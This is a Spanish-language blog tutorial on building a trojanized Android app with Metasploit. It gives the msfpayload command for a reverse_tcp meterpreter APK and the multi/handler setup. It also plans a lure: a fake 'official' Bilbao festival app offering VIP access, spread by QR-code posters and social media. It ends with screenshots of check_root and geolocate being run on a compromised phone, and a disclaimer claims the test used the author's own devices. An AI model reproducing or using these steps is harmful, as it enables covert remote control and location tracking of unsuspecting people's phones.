Como ya sabéis, metasploit es la herramienta de explotación de vulnerabilidades por excelencia, en esta ocasión vamos a "atacar" dispositivos móviles personales con sistema Android.
El escenario es el siguiente, el equipo atacante (Kali Linux), un servidor FTP para que nuestras victimas puedan descargar fácilmente la App y las victimas (terminales Android).
Comencemos! es esencial tener instalado metasploit, en mi caso la distribución Kali linux lo trae integrado, así que procedemos, empezamos con el payload.
Crear el payload es muy sencillo, basta con introducir esta linea en una terminal.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8888 R> fiestasbilbao.apk
Esto indica lo siguiente, la App lleva la instrucción de iniciar una sesión meterpreter contra 192.168.1.11 por el puerto 8888, la R indica que la salida es en formato .apk, escogemos el nombre e introducimos la orden, tardará un poco, una vez finalice podremos observar nuestra App en el escritorio, previamente habremos hecho un cd Desktop para crear el payload en el escritorio, de lo contrario me parece que se crea en el directorio Home, ahí tenéis una imagen del proceso anterior
Una vez terminado el payload, arrancamos el metasploit, cuando arranque el script ejecutamos msfupdate, por si lo tenéis sin actualizar.
Ahora escogemos el exploit, introducimos use exploit/multi/handler , después toca escoger el payload
set payload android/meterpreter/reverse_tcp y por ultimo el local host (192.168.1.11) y el puerto local (8888) e introducimos por ultimo el comando exploit como muestra la siguiente imagen
Una vez ejecutada la orden exploit, metasploit se queda a la espera de que algún "usuario" instale y ejecute nuestra aplicación.
I. Recolectando clientes
Ahora ya tenemos nuestra aplicación, pero necesitamos usuarios, en este caso dispuestos a pasar una semana en las fiestas de bilbao, como pudisteis observar en el payload el nombre que escogí fue fiestasbilbao.apk, ahora interviene nuestra imaginación, la habilidad con la edición de imágenes y la herramienta S.E.T (Social Engineering Toolkit) esta herramienta también viene incluida en Kali linux, aquí tenéis una pequeña guia de como crear un QR con SET . Recordar que antes de crear el código debéis tener alojada la aplicación en algún servidor FTP ya sea propio o de alojamiento gratuito Una vez tengamos el código QR creado que nos dirige hacia un servidor FTP, donde esta alojada nuestra aplicación esperando a ser descargada.
Bien, ahora toca darle imaginación al asunto... creando un cartel que será distribuido por redes sociales, impreso en locales y demás. (5 minutos empleé en el cartel, ¿no esta tan mal no?)
Imagen creada con Photoshop Integrando el QR para descargar la APP |
Ahora todo depende de la promoción que recibió el cartel, fijo todos quieren un acceso VIP a los recintos ;)
Bien ! al parecer nuestro primer "usuario" descargó e instalo la App Oficial !
Finalmente tenemos la sesión meterpreter activada y esperando a que le deis uso, introduciendo help en la linea de meterpreter, nos mostrará todo lo que podemos hacer en el dispositivo.
En mi caso decidí probar el check root (Si el teléfono esta rooteado y cae en esta "trampa" el daño puede ser de una magnitud mucho mayor) y la localización.
Como podéis observar el check_root y geolocate, he de decir este ultimo tiene una precisión de 5m de error (en mi caso) |
AQUÍ tenéis un enlace de interés relacionado con esta practica .
Recordar si tenéis alguna duda o alguna pregunta dejarla en comentarios!
Podéis seguirme en twitter @jdavidsora
ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y PERSEGUIDO POR LOS CUERPOS DE SEGURIDAD DEL ESTADO, RECOMIENDO REALIZAR ESTAS PRACTICAS EN ENTORNOS CONTROLADOS